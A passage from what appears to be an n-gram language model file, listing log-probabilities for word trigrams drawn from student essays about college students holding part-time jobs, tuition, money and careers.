-1.5515805 cases , only
-1.7812603 life , only
-1.1644949 is not only
-0.7584908 , not only
-0.76972455 by not only
-0.76972455 study not only
-0.76972455 students not only
-1.1595936 are not only
-0.9331946 important not only
-0.76972455 productive not only
-0.76972455 learn not only
-0.76972455 patterns not only
-0.96710384 tuitions and only
-1.2619631 if students only
-1.4230039 focused on only
-1.4987316 even if only
-0.93363297 employment should only
-1.50549 we should only
-1.4194582 pocket money only
-0.9513355 cases they only
-1.7310394 and they only
-2.3188143 they are only
-0.703288 and history only
-1.932588 young people only
-1.2308917 students get only
-0.861423 is used only
-1.1370871 <s> Not only
-1.3193913 I really only
-0.9215896 he was only
-1.435199 only be sought
-1.4281721 is it necessary
-1.7943184 it is necessary
-1.7620212 job is necessary
-1.52629 studying is necessary
-1.52629 what is necessary
-1.9843229 at the necessary
-1.4012872 make the necessary
-0.95560086 lack the necessary
-0.95560086 assured the necessary
-0.964656 spend as necessary
-1.2566186 important or necessary
-1.4320328 skills are necessary
-1.4031563 people skills necessary
-0.8958022 be financially necessary
-2.0488753 <s> If necessary
-1.5221549 job for financial
-1.6069568 necessary for financial
-2.5003953 have a financial
-0.9640265 Without a financial
-2.2779722 , the financial
-0.96034753 often the financial
-2.4225917 of the financial
-1.2683165 management , financial
-1.2559953 social and financial
-0.9635045 insight and financial
-0.96370065 degree of financial
-2.155732 value of financial
-1.614841 by their financial
-1.4709522 all their financial
-0.94399005 augment their financial
-1.6447693 a better financial
-1.1598927 in personal financial
-0.5406091 in grave financial
-0.9488603 easing these financial
-1.003531 the actual financial
-0.77562577 of gaining financial
-0.7039302 part-time brings financial
-0.5406091 who face financial
-0.87471974 reasons -LRB- i.e.
-0.87471974 commitments -LRB- i.e.
-1.26735 hard and pay
-1.0448923 , to pay
-1.1778574 -RRB- to pay
-1.5930325 money to pay
-1.6822429 order to pay
-1.1778574 parents to pay
-0.9219076 make to pay
-1.4632642 had to pay
-0.9219076 capital to pay
-1.1778574 me to pay
-0.9219076 left to pay
-0.9219076 Peter to pay
-2.0997815 the students pay
-1.1915112 didn ft pay
-1.1200168 to help pay
-0.8968535 they help pay
-1.6806916 help them pay
-1.5359784 do n't pay
-0.8766697 of her pay
-0.9680406 -LRB- for tuition
-2.2663467 with the tuition
-0.9663688 cover the tuition
-0.90310866 reliance upon tuition
-1.2669928 expenses and tuition
-1.1714747 to pay tuition
-1.2260225 with college tuition
-1.7951556 of college tuition
-1.6944523 their own tuition
-1.4043257 for my tuition
-0.541139 the ever-increasing tuition
-0.9701716 were the fees
-0.9680855 reduce their fees
-0.9525429 pay tuition fees
-0.9525429 college tuition fees
-2.2027981 , or fees
-0.9322329 cover university fees
-1.0471783 my tertiary fees
-0.773456 <s> I agree
-1.6534594 , I agree
-0.86857826 extent I agree
-0.86857826 think I agree
-0.86857826 summary I agree
-0.8632097 I completely agree
-0.9298365 couldn ft agree
-0.8260146 I strongly agree
-0.77699226 I largely agree
-0.54140407 I totally agree
-0.9383248 case with college
-1.3546969 help with college
-0.15990399 important for college
-1.3217369 idea for college
-1.1841583 things for college
-0.9253913 applying for college
-1.1293752 statement that college
-1.1293752 time that college
-0.9478923 agree that college
-1.3225204 something that college
-1.4652102 think that college
-1.2481827 opinion that college
-1.2442354 for a college
-0.5947329 that a college
-1.0662541 , a college
-1.1271267 cases a college
-1.6766065 in a college
-0.9448771 of a college
-1.2626458 as a college
-0.60018265 As a college
-1.1271267 whether a college
-0.89303946 been a college
-1.1271267 obtaining a college
-1.7520018 reason is college
-1.6330466 a full-time college
-1.8240509 that the college
-1.7952951 of the college
-1.9784914 to the college
-1.2040237 enjoy the college
-1.2040237 beyond the college
-1.6248546 against the college
-2.0893598 job , college
-2.0236847 time , college
-1.8865225 Firstly , college
-1.9565767 <s> In college
-1.3029066 For many college
-1.3558553 too many college
-0.9323947 as any college
-0.523564 job in college
-1.5616746 students in college
-1.502531 time in college
-0.993964 are in college
-0.25118107 while in college
-0.899469 now in college
-0.899469 clubs in college
-1.4106863 college and college
-1.0079588 idea of college
-1.1579825 result of college
-1.5204561 out of college
-1.4689093 outside of college
-0.910771 purposes of college
-0.910771 kids of college
-0.4409991 ideas of college
-0.910771 dropout of college
-1.5946478 available to college
-1.9553485 going to college
-0.39086485 go to college
-1.4983349 of their college
-0.72129285 during their college
-0.90768236 finish their college
-1.15254 complete their college
-0.90768236 funding their college
-1.880662 <s> For college
-0.95300716 friends from college
-1.7642264 <s> The college
-1.0593362 we leave college
-1.6305867 , if college
-0.9003556 nice if college
-1.2165331 For some college
-1.5331786 student 's college
-0.9355159 that most college
-0.9522916 university or college
-0.91883224 campus ; college
-0.9458328 seeing more college
-0.7341448 themselves through college
-0.7341448 kids through college
-0.7341448 daughters through college
-1.1862028 study at college
-0.84530985 learned at college
-0.20624816 while at college
-0.84530985 course-load at college
-1.2037524 <s> Many college
-1.5580298 , when college
-0.571961 time after college
-0.6017594 work after college
-0.49316454 do after college
-0.571961 opportunities after college
-0.49316454 adult after college
-0.49316454 encounter after college
-0.571961 until after college
-0.49316454 home after college
-1.4891198 for all college
-0.91626793 believe all college
-0.7885479 <s> Japanese college
-0.631164 of Japanese college
-0.631164 to Japanese college
-1.5509645 <s> If college
-1.9777458 I believe college
-1.0728788 one fs college
-0.36806634 job during college
-0.83670276 study during college
-1.4709482 to enjoy college
-0.91883224 firmly support college
-0.927618 important than college
-0.8768498 we enter college
-0.9096794 Of my college
-0.9096794 throughout my college
-0.8665341 help afford college
-0.8522217 for poor college
-0.93761134 any young college
-0.536132 , non college
-0.7679623 work enables college
-1.8065811 I think college
-0.7679623 we reach college
-0.6974243 how easy college
-1.3481685 <s> All college
-0.536132 lives inside college
-1.3287523 of his college
-0.536132 Asia whereby college
-0.76949304 money among college
-0.99023217 , including college
-0.6974243 they finish college
-0.6974243 start post college
-1.0865512 <s> At college
-0.7679623 after leaving college
-0.80931044 when attending college
-0.6974243 off throughout college
-0.536132 <s> After college
-0.536132 <s> Advising college
-1.5003241 <s> I have
-1.5340195 and I have
-0.9398298 life can have
-0.9398298 person can have
-0.9170782 students that have
-0.9537177 people that have
-1.071181 student will have
-1.0447309 , will have
-0.93231666 and will have
-1.1393639 students will have
-0.76912177 time will have
-1.0162907 they will have
-0.76912177 you will have
-0.5409179 They will have
-0.76912177 eventually will have
-1.7011809 people , have
-0.9636208 older , have
-1.2049164 will not have
-0.6931739 may not have
-0.7348596 should not have
-0.74227816 do not have
-1.0504285 would not have
-1.1470969 did not have
-1.2944576 most cases have
-1.927043 money and have
-0.95091575 families and have
-0.95091575 spoiled and have
-1.1746957 student to have
-1.537959 , to have
-0.36382264 students to have
-1.6429949 time to have
-1.347861 only to have
-1.2694374 necessary to have
-1.6561164 have to have
-1.0912315 important to have
-1.696971 able to have
-1.5594366 chance to have
-0.9036322 seem to have
-0.9036322 companies to have
-1.347861 allowed to have
-1.1454474 me to have
-1.386761 that students have
-1.4653132 the students have
-1.4603597 , students have
-1.3004409 college students have
-1.3021259 some students have
-0.82702476 most students have
-1.2919304 all students have
-1.0524527 Japanese students have
-1.1496272 where students have
-1.764174 can also have
-0.94046164 it -RRB- have
-0.9346705 also then have
-0.80919194 many may have
-0.79326534 students may have
-0.80919194 society may have
-0.80919194 person may have
-1.3935653 student should have
-0.61745375 students should have
-0.8926903 college should have
-1.1245828 can only have
-1.1245828 they only have
-2.0756838 in college have
-1.0509065 that they have
-1.0977699 as they have
-0.4703997 time they have
-0.7495942 industry they have
-0.8443492 what they have
-1.054058 after they have
-0.34796935 because they have
-0.534558 which they have
-1.0710185 where they have
-0.9041658 than they have
-0.7495942 argue they have
-0.9709291 Maybe they have
-0.7495942 everything they have
-0.9771785 if you have
-1.0573592 when you have
-0.79942644 once you have
-1.1051831 of today have
-2.0802505 , or have
-0.8951272 so employers have
-0.95089126 apparent skills have
-0.8791257 students who have
-0.77391165 or who have
-0.77391165 People who have
-0.77391165 workers who have
-1.9780575 <s> There have
-0.7857143 don ft have
-1.013858 didn ft have
-0.28275383 what others have
-0.729879 because others have
-1.9584014 their parents have
-0.95205367 hard people have
-1.3338923 <s> They have
-0.811002 They fll have
-0.94062424 man could have
-1.1984981 people must have
-0.85616755 job might have
-0.869084 Restaurant workers have
-0.69970936 graduates similarly have
-1.0433918 I would have
-0.79165864 this would have
-1.0433918 it would have
-0.79165864 she would have
-0.90505856 students always have
-1.7254211 in Japan have
-0.83792454 All clubs have
-1.2588569 that we have
-1.1374707 jobs we have
-0.9947281 and thereby have
-0.5377069 what meaning have
-0.69970936 young players have
-0.31538063 <s> You have
-0.5377069 or woman have
-0.5377069 and hardly have
-0.5377069 of US have
-1.2163496 working with money
-1.6701267 dealing with money
-1.7930532 , for money
-0.9290265 parents for money
-1.1907771 value for money
-0.9290265 exchange for money
-1.2588245 Time is money
-1.7801081 with the money
-1.7056111 is the money
-1.3643353 and the money
-1.8336463 to the money
-0.9196383 And the money
-0.9196383 Saving the money
-0.9196383 manage the money
-1.173775 needs the money
-0.9196383 receive the money
-0.9196383 invest the money
-2.1565385 time , money
-1.6461589 amount of money
-1.5292011 understanding of money
-1.4911531 lot of money
-1.4911531 sense of money
-0.17023921 value of money
-1.3326609 responsibility of money
-0.6282008 use their money
-0.9213468 having little money
-1.9859757 such as money
-1.5552491 may have money
-1.3761361 you have money
-0.55544263 that extra money
-0.23985696 the extra money
-0.68349063 little extra money
-0.49010238 some extra money
-0.49298573 in making money
-0.49298573 are making money
-0.49298573 about making money
-0.9481821 putting some money
-0.7380776 having enough money
-0.8878176 have enough money
-0.7380776 ft enough money
-0.8080353 students need money
-0.7474494 you need money
-0.7474494 we need money
-0.4492468 to earn money
-0.73125356 we earn money
-1.7326884 of what money
-1.811182 to get money
-1.4099603 to make money
-0.8580475 To make money
-0.7092762 that earning money
-0.7092762 also earning money
-1.2988025 their own money
-1.0274779 your own money
-0.91929394 things without money
-0.8133106 Time becomes money
-0.21861804 extra pocket money
-0.34104612 or pocket money
-0.9151042 spent my money
-0.9151042 spending my money
-1.308315 of getting money
-0.53893584 have saved money
-0.88265336 choice between money
-0.8725761 to waste money
-0.3879256 to save money
-0.49298573 families save money
-0.49298573 both save money
-0.87293476 would choose money
-0.70902 extra spending money
-0.70902 own spending money
-0.53893584 <s> Extra money
-0.34104612 the prize money
-0.34104612 grand prize money
-0.6220863 do this they
-1.2408125 , be they
-0.94295377 is that they
-0.8491062 , that they
-0.91120815 studies that they
-0.91120815 work that they
-0.75451565 money that they
-0.75451565 better that they
-0.75451565 complain that they
-0.75451565 show that they
-1.0175778 something that they
-0.75451565 demands that they
-0.75451565 subjects that they
-0.6286647 things that they
-1.0824549 think that they
-0.75451565 argue that they
-0.97915286 opinion that they
-0.75451565 policy that they
-0.75451565 field\/industry that they
-0.75451565 recommend that they
-2.337437 time job they
-1.3733302 study , they
-1.5099019 studies , they
-1.0710042 college , they
-1.6269008 money , they
-0.9126189 at , they
-0.9126189 major , they
-0.9126189 financing , they
-0.9126189 excels , they
-0.9126189 necessities , they
-0.9126189 teacher , they
-0.9126189 tourism , they
-0.9126189 apply , they
-0.9126189 casino , they
-1.5923725 or not they
-1.2877989 most cases they
-1.1898217 of employment they
-1.3064984 student and they
-1.6302402 , and they
-1.5365804 studies and they
-1.1730046 tuition and they
-1.1730046 world and they
-0.91920906 technology and they
-0.91920906 distracted and they
-1.5242134 of course they
-1.2122872 are studying they
-1.5809544 the experience they
-0.86549723 , as they
-1.0360067 money as they
-0.83759403 benefits as they
-1.0360067 much as they
-1.0360067 soon as they
-0.83759403 -- as they
-1.4758177 the time they
-1.4406527 of time they
-1.210985 available time they
-1.1007947 limited time they
-1.2787179 free time they
-1.4865782 at school they
-0.41472006 it if they
-0.41472006 be if they
-0.5033906 that if they
-0.48040777 , if they
-0.25746983 and if they
-0.41472006 studies if they
-0.41472006 -LRB- if they
-0.5158645 even if they
-0.41472006 more if they
-0.41472006 these if they
-0.41472006 than if they
-0.41472006 later if they
-0.41112298 Even if they
-0.41472006 household if they
-1.4219556 , then they
-1.0775439 jobs then they
-1.9000736 , but they
-0.91194534 If necessary they
-1.6102368 during college they
-0.49563894 the money they
-1.5870886 extra money they
-0.7178971 job so they
-0.978989 is so they
-0.9193745 and so they
-0.7178971 structure so they
-0.7178971 fun so they
-0.9097528 college : they
-2.0413678 , or they
-1.1759102 chosen career they
-0.9191976 society ; they
-1.1228433 the industry they
-0.85602695 the skills they
-1.0654833 leadership skills they
-0.85602695 finding skills they
-1.3898513 the people they
-1.4507313 of people they
-0.5652196 job when they
-0.4875345 field when they
-0.4875345 school when they
-0.4875345 so when they
-0.4875345 more when they
-0.5652196 better when they
-0.4875345 people when they
-0.4875345 useless when they
-0.4875345 education when they
-0.4875345 quit when they
-0.4875345 things when they
-0.4875345 later when they
-0.94772726 Nor do they
-0.8922232 job while they
-0.6816523 jobs while they
-0.60371614 work while they
-0.6816523 mentors while they
-0.83181894 the theories they
-0.7444376 of what they
-0.79472065 to what they
-0.49312493 on what they
-0.6701323 do what they
-0.6701323 nor what they
-0.6701323 payback what they
-0.9118981 job after they
-0.71318084 student after they
-0.71318084 have after they
-0.71318084 enough after they
-1.5764045 are all they
-0.6393939 college because they
-0.5486586 more because they
-0.5486586 advantage because they
-0.5486586 workers because they
-0.5486586 activity because they
-0.5486586 behind because they
-1.5524174 <s> If they
-0.8353951 , whatever they
-0.53630674 <s> Neither they
-0.6976776 the least they
-1.1272053 in which they
-0.811429 activities which they
-0.811429 facts which they
-0.34688985 that once they
-0.34688985 relationships once they
-0.34688985 life once they
-0.34688985 begins once they
-0.8740336 a world they
-1.4409702 real world they
-0.6733062 is where they
-0.5759711 and where they
-0.6733062 place where they
-0.5759711 lives where they
-0.5759711 choose where they
-0.9139433 even find they
-0.6976776 or stressful they
-0.8228791 more than they
-0.4862303 , before they
-0.29219642 work before they
-0.4862303 life before they
-0.4862303 lifestyle before they
-0.86608636 h until they
-0.6976776 their classrooms they
-0.9341696 , since they
-0.7271415 wisely since they
-0.6976776 would argue they
-0.23432973 <s> Maybe they
-1.2431045 per week they
-0.7682603 make sure they
-0.53630674 the information they
-0.6976776 social connections they
-1.2869445 <s> When they
-0.6976776 I doubt they
-0.8525835 almost everything they
-1.0325394 educational materials they
-0.6976776 and dedication they
-0.6976776 spend anyway they
-2.388889 , I say
-1.7409415 not to say
-1.8353901 as they say
-1.5847247 <s> To say
-1.2482055 Some people say
-0.9552814 Some would say
-0.99574435 job that you
-1.6597753 is that you
-1.1625066 parents that you
-0.91332567 see that you
-1.3753752 something that you
-1.2438066 this , you
-1.9829057 students , you
-1.8857255 money , you
-1.5172676 second , you
-0.96692485 teaching and you
-0.90563214 And if you
-0.90563214 value if you
-0.89365876 also benefit you
-0.926783 Don ft you
-0.88570225 dorm gives you
-1.5157772 the people you
-0.8741898 eventually see you
-0.8500879 food when you
-0.8500879 help when you
-0.8500879 fs when you
-0.5400801 and practices you
-1.1877905 the classes you
-1.5848917 <s> If you
-0.8422266 do whatever you
-1.5813137 can get you
-0.8847982 jobs teach you
-0.87549525 and once you
-0.8741898 position until you
-0.8393022 by definition you
-0.5400801 <s> Thank you
-0.70315975 like everywhere you
-1.7262436 students that extra
-2.3315494 for the extra
-2.2931683 , the extra
-1.2513081 use the extra
-0.96924686 need of extra
-1.5554733 all their extra
-0.725825 a little extra
-1.5110303 to gain extra
-1.6340674 taking on extra
-2.2842665 <s> The extra
-1.2459265 take an extra
-0.7742088 on some extra
-0.7742088 making some extra
-0.7742088 earn some extra
-0.7742088 provide some extra
-1.4443774 food , making
-1.4395255 interest in making
-1.5654185 purpose of making
-1.910978 , to making
-1.7995653 , then making
-2.367737 they are making
-1.2085187 learn about making
-0.91710436 student with some
-1.5279249 , with some
-0.91710436 are with some
-0.929483 that for some
-1.1916115 but for some
-1.3320012 responsible for some
-0.929483 traumatizing for some
-1.2653023 So , some
-1.5910697 <s> In some
-0.85410535 , In some
-1.0632576 , in some
-1.5310109 and in some
-0.44721836 or in some
-1.2046691 classes in some
-1.2622573 be of some
-1.50516 <s> For some
-1.3715614 , has some
-1.6223023 taking on some
-0.87354934 then making some
-1.1385796 There are some
-1.54278 should spend some
-0.93453825 who need some
-0.88304746 may put some
-0.7020066 started putting some
-1.7353704 to earn some
-0.89884436 into use some
-0.9275736 will provide some
-0.88304746 may teach some
-1.50776 there fs some
-1.6094098 to find some
-0.92005956 career without some
-0.89175254 are just some
-1.2998837 it means some
-1.131519 into practice some
-1.8376 I think some
-0.53928757 or clean some
-0.89175254 reason why some
-0.7020066 to avoid some
-0.87248117 may lose some
-2.0096276 not be so
-2.4317956 time job so
-2.3096955 it is so
-1.8545883 that is so
-1.5630271 studying is so
-0.9519362 little , so
-1.9356285 students , so
-1.8452226 Firstly , so
-0.9519362 schooling , so
-0.9519362 low , so
-1.8499852 is not so
-1.2212795 were not so
-1.9583555 money and so
-0.95455295 productivity and so
-1.2386113 children and so
-1.4102856 students working so
-1.8072106 is also so
-1.9071451 not have so
-0.94739175 today have so
-1.6771417 <s> And so
-1.621283 has become so
-2.0670385 There are so
-1.5752529 we are so
-0.8839333 They learned so
-1.436986 , doing so
-0.915077 not do so
-1.1866555 to do so
-0.9390374 properly because so
-0.9557189 brought them so
-1.625029 of education so
-0.53955156 with structure so
-0.9284557 40 years so
-1.6088734 I was so
-0.9106502 actually go so
-0.7744382 have fun so
-0.8923161 see why so
-0.8934083 or later so
-0.53955156 and chores so
-0.94295955 banned smoking so
-1.2577947 in with bad
-2.5020983 is a bad
-1.441851 about the bad
-0.964656 is as bad
-1.2350346 not so bad
-1.8002036 <s> A bad
-0.41620955 it taste bad
-0.8872421 they develop bad
-0.541139 it smells bad
-1.0976243 for the following
-1.2530934 offer the following
-0.9620223 classes the following
-2.309394 <s> The following
-1.3885677 in these following
-1.1108903 work world following
-0.8834946 Disney world following
-1.2792873 following reasons :
-1.4840984 two reasons :
-0.96667266 are to :
-0.96667266 limited to :
-2.0182943 such as :
-2.1150353 in college :
-0.8436701 in particular :
-0.87664145 ultimate purpose :
-0.7760808 so fortunate :
-0.7760808 and budget :
-0.8866888 the spending :
-0.895145 gave me :
-0.86209834 sleeping habits :
-0.540874 valid counter-argument :
-1.1778303 reasons : -
-1.7018135 , part -
-0.93796015 @ society -
-0.94074243 hand smoke -
-0.9220978 purpose : To
-0.8184666 : - To
-1.5458702 college will begin
-2.227174 , students begin
-1.1618018 <s> To begin
-0.78292996 - To begin
-1.047435 will likely begin
-0.7771444 the difficulties begin
-0.97055566 with , today
-2.0583153 <s> In today
-0.9617469 up in today
-1.2525551 person in today
-0.45478368 youth of today
-0.902998 , employers today
-0.89609206 around me today
-0.5413157 is happing today
-1.7171768 , it 's
-1.0954514 And it 's
-1.2041106 If it 's
-0.8742827 Because it 's
-0.8742827 however it 's
-0.96781695 course that 's
-1.5502574 a student 's
-1.3850042 the student 's
-1.156677 individual student 's
-0.59976757 of one 's
-0.8014488 to one 's
-0.6751726 pursuing one 's
-0.6751726 cloud one 's
-0.6751726 complement one 's
-0.6751726 complements one 's
-0.8872421 , today 's
-1.2471619 other people 's
-1.6510937 <s> It 's
-0.8120487 <s> That 's
-1.5116677 a person 's
-1.7671072 the job market
-1.2299348 's job market
-0.9382583 current employment market
-1.4250622 one can become
-2.0804126 they will become
-1.8608751 -RRB- , become
-0.9575198 it and become
-1.2443358 mature and become
-0.9575198 wings and become
-2.0845528 students to become
-1.1601818 order to become
-1.1862712 people to become
-1.7332585 them to become
-0.92655444 Japanese to become
-1.709454 how to become
-1.4968944 learning to become
-0.92655444 plan to become
-0.92655444 obliged to become
-0.8218461 wish to become
-0.56800747 it has become
-0.7004492 , has become
-0.56800747 work has become
-0.56800747 market has become
-0.56800747 education has become
-0.56800747 Poker has become
-0.56800747 poker has become
-1.6448618 before they become
-1.346302 <s> They become
-0.88694775 students perhaps become
-0.5410506 when workloads become
-2.5231664 is a highly
-1.2672445 society is highly
-1.6449797 has become highly
-1.4012885 I would highly
-0.8186068 become highly competitive
-1.2461556 much more competitive
-1.7333703 time for most
-0.9580987 independence for most
-1.5550297 experience that most
-1.4368156 point is most
-1.0097463 is the most
-2.266187 , the most
-1.4129378 make the most
-1.2441878 Generally , most
-1.775661 First , most
-0.9574435 Australia , most
-0.9574435 Usually , most
-1.5972972 <s> In most
-1.764364 , in most
-0.8378302 and in most
-0.949574 which in most
-1.8887502 , and most
-0.9627949 first and most
-0.96319383 concern of most
-0.96319383 atmosphere of most
-1.2608702 is their most
-1.8261944 <s> The most
-1.549311 should spend most
-0.88579214 , entering most
-0.9476098 f which most
-1.6555415 they would most
-1.2255617 will learn most
-1.450238 <s> So most
-1.1374357 <s> Perhaps most
-0.8157978 at its most
-1.4909871 of a degree
-1.3872102 students a degree
-1.5034742 earn a degree
-1.5034742 getting a degree
-0.9680855 receive their degree
-2.2582183 a college degree
-0.96443766 diploma or degree
-0.8772552 a business degree
-0.54140407 a four-year degree
-1.5555109 as it does
-0.89609206 college degree does
-0.88761127 other benefits does
-0.84176666 The alternative does
-0.95307374 for what does
-0.5413157 skills exactly does
-1.2114555 breathing smoke does
-1.2609444 does not guarantee
-1.197714 with no guarantee
-0.9553819 of it or
-1.8259062 a job or
-2.0945776 part-time job or
-1.630125 time job or
-1.4717526 after graduation or
-1.0830758 part-time , or
-1.0830758 restaurant , or
-1.3514886 studies , or
-1.2957865 school , or
-1.3985196 work , or
-1.391331 -RRB- , or
-0.8668035 pay , or
-1.4474884 money , or
-0.8668035 some , or
-1.1882803 food , or
-1.2522956 activities , or
-0.8668035 ability , or
-1.3527229 education , or
-1.0830758 come , or
-0.8668035 rest , or
-0.8668035 service , or
-0.8668035 day , or
-0.8668035 studied , or
-0.8668035 us , or
-1.0830758 restaurants , or
-0.8668035 over-exertion , or
-0.8668035 depression , or
-0.8668035 patrons , or
-0.8668035 diners , or
-1.9772217 of study or
-1.2085934 , studying or
-1.2898896 with little or
-0.9518974 hard working or
-1.5386825 a restaurant or
-2.0298295 their studies or
-1.8972069 their time or
-0.9565012 either work or
-0.8613693 Reducing -LRB- or
-0.8613693 rights -LRB- or
-0.9468388 employees may or
-1.142789 pay tuition or
-1.2451941 with college or
-0.9262198 doing well or
-0.53517234 the newspapers or
-0.8513167 to whether or
-0.80625856 corporate organization or
-2.0241475 is important or
-1.307558 fs important or
-1.2407398 are learned or
-0.90089345 fast food or
-0.78134453 by parents or
-0.9637829 their parents or
-0.78134453 like parents or
-1.0561433 their major or
-0.9177739 attending classes or
-0.6960337 different fields or
-0.8513167 or club or
-0.9205035 a university or
-0.8740175 personal expenses or
-0.53517234 , grants or
-1.2880837 a family or
-0.94195 much education or
-0.931 mention learning or
-0.53517234 becomes time-consuming or
-0.6960337 by organizations or
-0.53517234 their son or
-0.4128095 dedicate him or
-1.158045 the government or
-0.80625856 failing courses or
-0.53517234 of book or
-0.83210784 for rent or
-0.53517234 Cleaning toilets or
-0.8333507 international law or
-0.904779 five days or
-1.1723751 doing homework or
-0.53517234 late teens or
-1.0698128 a positive or
-0.55258316 a class or
-0.6442354 to class or
-0.55258316 swimming class or
-0.55258316 miss class or
-0.46558684 a company or
-0.46558684 bad company or
-0.6960337 good references or
-0.62935984 If he or
-0.62935984 since he or
-0.62935984 principles he or
-0.53517234 he likes or
-0.6960337 -LRB- finance or
-0.53517234 graphic design or
-0.53517234 , sports or
-0.53517234 do sooner or
-1.0571599 to his or
-0.85086954 when his or
-0.53517234 any delay or
-0.6960337 their schools or
-0.53517234 to partly or
-0.6960337 a lab or
-0.53517234 their house or
-0.83210784 fellow employees or
-0.53517234 at hotels or
-0.8295817 <s> Whether or
-0.53517234 young men or
-0.33921602 lab experiments or
-0.33921602 chemistry experiments or
-0.6960337 as bars or
-0.8295817 a diploma or
-0.76632696 young man or
-0.53517234 convenience stores or
-0.53517234 their sons or
-0.83210784 people eat or
-0.6960337 with worries or
-0.53517234 working 30 or
-1.8514657 job that pays
-0.8777878 work generally pays
-0.96308273 productive with well
-1.4116884 do this well
-1.256484 do it well
-2.2013578 can be well
-1.5584325 becoming a well
-2.002797 This is well
-1.5189523 some cases well
-0.88713115 job as well
-0.6211858 , as well
-0.7375912 study as well
-0.88713115 jobs as well
-0.88713115 money as well
-0.7375912 environment as well
-0.7375912 people as well
-0.7375912 finances as well
-0.7375912 beneficial as well
-0.7375912 socially as well
-0.7375912 smokers as well
-1.4953535 do so well
-0.7035448 that pays well
-1.2650701 <s> As well
-0.9352755 not doing well
-0.9163802 To do well
-0.9163802 would do well
-0.7035448 what works well
-0.9459612 graduates could well
-0.8398291 to function well
-1.7896627 <s> A well
-0.8609898 perform tasks well
-2.8185043 of the advertisements
-0.968682 advertisements that appear
-1.4073776 this may appear
-2.548219 in the newspapers
-0.9655893 or on on-line
-0.5417812 on on-line portals
-2.5504236 , the preferred
-1.37353 is much preferred
-1.0783447 are pursuing candidates
-0.7055833 the preferred candidates
-2.0346606 job , even
-1.9431272 students , even
-1.8087926 work , even
-0.952813 And , even
-0.952813 addicted , even
-1.8278681 may not even
-1.5189523 some cases even
-1.6616933 home and even
-0.95612115 authority and even
-0.95612115 couples and even
-0.96822083 performance of even
-1.4399799 exposed to even
-0.9411098 boss -LRB- even
-1.5118992 students may even
-1.1700215 They may even
-1.2593478 people they even
-1.1363616 , or even
-0.9169508 courses or even
-1.1689619 experiments or even
-0.7035448 preferred candidates even
-1.7192471 to spend even
-0.94355804 take up even
-1.5143236 <s> But even
-0.8853834 or perhaps even
-1.5329953 they want even
-1.0143803 to fulfill even
-0.7035448 and possibly even
-0.96894807 even for entry
-0.958831 distract this level
-1.5648235 into a level
-2.4274762 , the level
-2.4897091 to the level
-1.4000356 the necessary level
-0.54140407 for entry level
-0.9438248 and energy level
-0.93024135 their part-time positions
-0.93024135 fill part-time positions
-1.2282406 in such positions
-0.86343884 entry level positions
-0.92180777 into high positions
-0.81796503 manual labor positions
-0.7050885 and treasurer positions
-0.88899493 The reasons are
-1.3083148 main reasons are
-1.3491485 experience that are
-1.4119134 jobs that are
-0.8942429 industry that are
-0.7989791 skills that are
-1.2479416 life that are
-0.8942429 Students that are
-2.0136216 a job are
-2.1437654 time job are
-2.0229115 college student are
-1.533756 study , are
-2.0731533 time , are
-1.9642367 , and are
-1.1979706 personality and are
-1.5965812 parents and are
-0.93294895 anything and are
-1.1979706 confidence and are
-0.62328714 , there are
-0.9554113 and there are
-0.78484935 Perhaps there are
-1.1860833 that students are
-1.2586524 the students are
-1.0671086 , students are
-1.1274846 many students are
-0.9363593 and students are
-1.0499752 to students are
-0.7718941 reason students are
-0.7718941 time students are
-1.4367206 college students are
-0.9363593 Most students are
-0.9363593 ; students are
-0.86588967 College students are
-0.7718941 when students are
-0.7718941 recently-graduated students are
-1.0767567 young students are
-1.454559 part-time jobs are
-1.3469226 time jobs are
-0.8805959 f jobs are
-0.69729763 tasks effectively are
-1.895765 , but are
-2.1492019 a college are
-1.9165279 in college are
-1.1244892 that they are
-0.7727382 , they are
-0.986045 and they are
-0.70653486 course they are
-0.7659429 as they are
-0.70653486 school they are
-0.4482995 if they are
-0.9677545 money they are
-0.9014421 skills they are
-0.45467296 when they are
-0.21318287 while they are
-0.70653486 theories they are
-0.9333339 once they are
-0.70653486 find they are
-0.6569747 before they are
-0.70653486 week they are
-0.65922344 that you are
-0.8293688 when you are
-0.659165 classes you are
-0.36419225 If you are
-0.659165 definition you are
-0.88486123 The following are
-0.8766697 employers today are
-0.8663598 level positions are
-0.85569656 many skills are
-1.1653135 Such skills are
-1.1653135 these skills are
-1.0727314 <s> These are
-0.90082943 students who are
-0.6268552 candidates who are
-0.35116217 people who are
-0.8393837 those who are
-0.6268552 groups who are
-0.6268552 individuals who are
-0.6268552 patrons who are
-1.1795483 smokers themselves are
-0.24722654 <s> There are
-1.2720731 their parents are
-0.8681273 if parents are
-0.9263121 are doing are
-0.91777855 as people are
-0.91777855 less people are
-0.80934 <s> They are
-1.1210108 <s> People are
-0.9194754 such classes are
-0.83130157 <s> Workers are
-0.53604466 <s> Evaluations are
-0.31465554 <s> Internships are
-0.92764527 These activities are
-0.9066931 balancing responsibilities are
-1.1782702 at university are
-0.72722673 if finances are
-0.72722673 unless finances are
-0.8848671 internships which are
-0.8848671 paths which are
-0.8759231 these expenses are
-1.3561639 , these are
-0.9109254 If customers are
-1.4479908 work force are
-0.53604466 College campuses are
-0.53604466 and discovery are
-0.98998374 these factors are
-1.3730476 <s> Some are
-0.93041277 work offers are
-1.0016955 work ethics are
-1.1051209 their lives are
-0.92039794 our lives are
-0.927581 These things are
-1.7078087 in Japan are
-0.908654 of hours are
-0.90661454 Those days are
-0.53604466 they never-the-less are
-0.8759231 card companies are
-0.69729763 and reports are
-1.0078307 that we are
-1.0757267 , we are
-0.7713833 reason we are
-0.402268 if we are
-0.69729763 again classmates are
-0.86719453 The children are
-0.53604466 of shoppers are
-0.53604466 point averages are
-0.8078884 The weekends are
-0.53604466 for superiors are
-0.53604466 being rejected are
-0.53604466 dollar signs are
-1.3655716 ban smoking are
-1.1924592 who smoke are
-0.83130157 <s> Restaurants are
-0.53604466 , unknowingly are
-0.9710474 two , As
-1.1455239 are several ways
-2.1841552 they have ways
-1.3885677 in these ways
-0.94315493 far out ways
-1.9617627 for a career
-0.9498522 pursue a career
-0.9498522 planning a career
-1.2296149 creating a career
-0.9691185 array of career
-2.2879853 in their career
-0.6849178 the chosen career
-0.91616917 their chosen career
-1.7755643 that are career
-0.85785913 her future career
-0.85785913 desired future career
-0.8624363 a different career
-0.40376922 a successful career
-1.2420009 to my career
-0.9427098 those whose career
-0.5409623 fs targeted career
-0.9307643 are career oriented
-0.9582222 supplemented by internships
-1.565553 form of internships
-2.0306695 such as internships
-0.89666134 not offer internships
-2.4436839 in a practical
